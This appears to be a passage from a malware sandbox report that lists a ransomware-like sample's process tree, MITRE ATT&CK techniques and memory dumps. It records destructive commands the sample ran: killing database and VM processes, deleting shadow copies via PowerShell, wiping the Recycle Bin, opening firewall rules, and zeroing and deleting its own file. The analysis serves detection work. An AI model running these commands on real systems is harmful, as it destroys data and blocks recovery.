- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld-nt.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:708
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqlservr.exe /F
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:772
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM ragent.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:976
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rmngr.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:512
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM rphost.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3068
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1324
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM 1cv8.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1716
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM sql.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1984
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM mysqld.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3604
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM oracle.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3656
- C:\Windows\SysWOW64\taskkill.exe
  "taskkill.exe" /IM vmwp.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3096
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:656
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  2⤵
  PID:3332
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  2⤵
  PID:976
- C:\Windows\SysWOW64\netsh.exe
  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
  2⤵
  PID:4012
- C:\Windows\SysWOW64\arp.exe
  "arp" -a
  2⤵
  PID:1856
- C:\Windows\SysWOW64\notepad.exe
  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\-Инструкция.txt
  2⤵
  PID:2896
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:1432
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2948
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Worker-1.exe
  2⤵
  PID:2764

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
1⤵
PID:3504

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/656-186-0x00000000070A0000-0x00000000070A1000-memory.dmp

Filesize
4KB

Download
memory/656-193-0x0000000006A60000-0x0000000006A61000-memory.dmp

Filesize
4KB

Download
memory/656-192-0x0000000008010000-0x0000000008011000-memory.dmp

Filesize
4KB

Download
memory/656-207-0x0000000006A63000-0x0000000006A64000-memory.dmp

Filesize
4KB

Download
memory/656-184-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/656-195-0x0000000007D00000-0x0000000007D01000-memory.dmp

Filesize
4KB

Download
memory/656-194-0x0000000006A62000-0x0000000006A63000-memory.dmp

Filesize
4KB

Download
memory/656-206-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/656-183-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/656-185-0x0000000000E10000-0x0000000000E11000-memory.dmp

Filesize
4KB

Download
memory/656-208-0x0000000006A64000-0x0000000006A66000-memory.dmp

Filesize
8KB

Download
memory/656-196-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/656-191-0x0000000006F10000-0x0000000006F11000-memory.dmp

Filesize
4KB

Download
memory/656-190-0x00000000077A0000-0x00000000077A1000-memory.dmp

Filesize
4KB

Download
memory/656-188-0x0000000006F70000-0x0000000006F71000-memory.dmp

Filesize
4KB

Download
memory/656-187-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

Filesize
4KB

Download
memory/2768-117-0x0000000005390000-0x0000000005391000-memory.dmp

Filesize
4KB

Download
memory/2768-115-0x0000000000B40000-0x0000000000B41000-memory.dmp

Filesize
4KB

Download
memory/2768-119-0x00000000059E0000-0x00000000059E1000-memory.dmp

Filesize
4KB

Download
memory/2768-209-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

Filesize
4KB

Download
memory/2768-210-0x00000000079A0000-0x00000000079A1000-memory.dmp

Filesize
4KB

Download